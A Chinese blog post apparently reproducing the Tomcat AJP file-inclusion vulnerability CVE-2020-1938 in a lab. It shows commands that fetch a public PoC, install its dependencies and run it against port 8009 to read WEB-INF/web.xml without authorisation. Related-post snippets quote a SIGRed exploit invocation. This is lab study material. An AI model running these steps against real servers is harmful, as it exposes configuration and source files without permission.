CVE-2020-1938漏洞复现

最新推荐文章于 2024-03-22 11:32:46 发布
最新推荐文章于 2024-03-22 11:32:46 发布
阅读量3.7k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: tomcat 安全 安全漏洞 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39682037/article/details/105034427
版权

CVE-2020-1938漏洞复现

简介

Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。
由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。

漏洞影响

Apache Tomcat 9.x < 9.0.31
Apache Tomcat 8.x < 8.5.51
Apache Tomcat 7.x < 7.0.100
Apache Tomcat 6.x

前期准备

centos一台(IP:192.168.139.126)
在这里插入图片描述

Tomcat正常启动且开启了AJP Connector 服务端口
在这里插入图片描述
kali linux一台,使其能访问192.168.139.126:8080
在这里插入图片描述
并做如下配置

gohb@gohb:~/桌面$ git clone https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC.git
#下载poc文件
gohb@gohb:~/桌面$ cd CNVD-2020-10487-Tomcat-ajp-POC/
gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ ls
gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ cat requirements.txt
gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ pip install ajpy==0.0.4 -i https://pypi.tuna.tsinghua.edu.cn/simple/ 
gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ pip install  colorama==0.4.3 -i https://pypi.tuna.tsinghua.edu.cn/simple/ 
gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ pip install colorlog==4.1.0 -i https://pypi.tuna.tsinghua.edu.cn/simple/ 
#下载poc文件运行相关依赖包
#或者尝试这样gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/
#小编是因为直接下载报错所以不得不逐条下载

开始实验

gohb@gohb:~/桌面/CNVD-2020-10487-Tomcat-ajp-POC$ python poc.py -p 8009 -f "/WEB-INF/web.xml" 192.168.139.126

在非授权条件下,成功访问到的WEB-INF下的web.xml
在这里插入图片描述

qq_39682037
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve-2020-1350:Bash概念验证(PoC)脚本可利用SIGRed(CVE-2020-1350)。 在运行Windows Server 2003直至Windows Server 2019的域控制器上实现域管理
04-13
cve-2020-1350 Bash概念验证(PoC)脚本可利用SIGRed(CVE-2020-1350)。 在运行Windows Server 2003直至Windows Server 2019的域控制器上实现Domain Admin。 ================================================== == 要从Windows Active Directory网络上Linux主机运行,请执行以下操作: 〜#chmod + x cve-2020-1350.sh 〜#./cve-2020-1350.sh 10.0.0.1 ================================================== === 参考: CVE-2020-1350 | Windows DNS服务器远程执行代码漏洞 2020年7月安全更新
CVE-2020-1938
龙卷风摧毁停车场
02-28 571
攻击者可以利用这个漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件。读取webapp目录下的任意文件,包括war包。环境搭建。
Tomcat AJP 文件包含漏洞CVE-2020-1938) 修复方案 及其思考
最新发布
weixin_53883156的博客
03-22 725
Tomcat 配置了两个 Connector,它们分别是 HTTP 和 AJP :HTTP 默认端口为 8080,处理 http 请求,而 AJP 默认端口 8009,用于处理 AJP 协议的请求,而 AJP 比 http 更加优化,多用于反向、集群等,漏洞由于 Tomcat AJP 协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器 webapp 下的任意文件以及可以包含任意文件,如果有某上传点,上传图片马等等,即可以获取 shell。
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
weixin_43102772的博客
03-09 4721
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
幽灵猫 Tomcat文件读取/任意文件包含漏洞CVE-2020-1938 / CNVD-2020-10487)
m0_62466350的博客
05-11 3432
漏洞是由长亭科技安全研究员发现的存在于 Tomcat 安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。
TomcatCVE-2020-1938 漏洞复现&解决
yjw2017的博客
09-14 840
Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等
Tomcat 文件读取/文件包含漏洞复现CVE-2020-1938
oiadkt的博客
04-12 1560
Tomcat 文件读取/文件包含漏洞复现CVE-2020-1938
网络安全---漏洞复现Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
m0_67844671的博客
09-12 7139
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
CVE2020-1938漏洞复现
hellodaoyan的博客
01-19 1019
这个漏洞tomcat的 然后我们先了解漏洞产生的原理 首先我们先来看tmocat纠结是干什么的 tomcat是个间件 最主要的两个结构、 servlet的定义和部分源码, 漏洞就是从这来的 tomcat处理http请求 源码分析 tomcat 8.5.46 哎 这教学视频讲半天看不懂 不看原理了 java 我都没学过 很多 只会hello world 直接实操吧 浪费我30min时间 直接开始复现 docker 开始搭建环境 我们的主机下载好后 随遍拖
CVE-2020-1938任意文件读取漏洞复现
热门推荐
weixin_45715461的博客
05-30 1万+
CVE-2020-1938任意文件读取漏洞复现
Apache Tomcat CVE-2020-1938 漏洞
A_991128a的博客
02-20 1085
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全文版)③项目源码(四五十个有趣且经典的练手项目及源码)
DNS Server远程代码执行漏洞复现(CVE-2020-1350)
谢公子的博客
07-26 5056
漏洞描述 2020年7月15日,微软发布补丁修复了一个标注为远程代码执行的DNS Server漏洞,官方分类为“可蠕虫级”高危漏洞,易受攻击的漏洞有可能通过恶意软件在易受攻击的计算机之间传播,而无需用户干预。CVSS评分10分(即高危且易利用),漏洞编号CVE-2020-1350。未经身份验证的攻击者可以发送特殊构造的数据包到目标DNS Server来利用此漏洞,成功利用此漏洞可能达到远程代码执行的效果。如果域控制器上存在DNS服务,攻击者可利用此漏洞获取到域控制器的系统权限。另外,DNS服务器一..
Tomact_CVE-2020-1938漏洞复现
08-31
- *1* *3* [CVE-2020-1938 漏洞复现](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值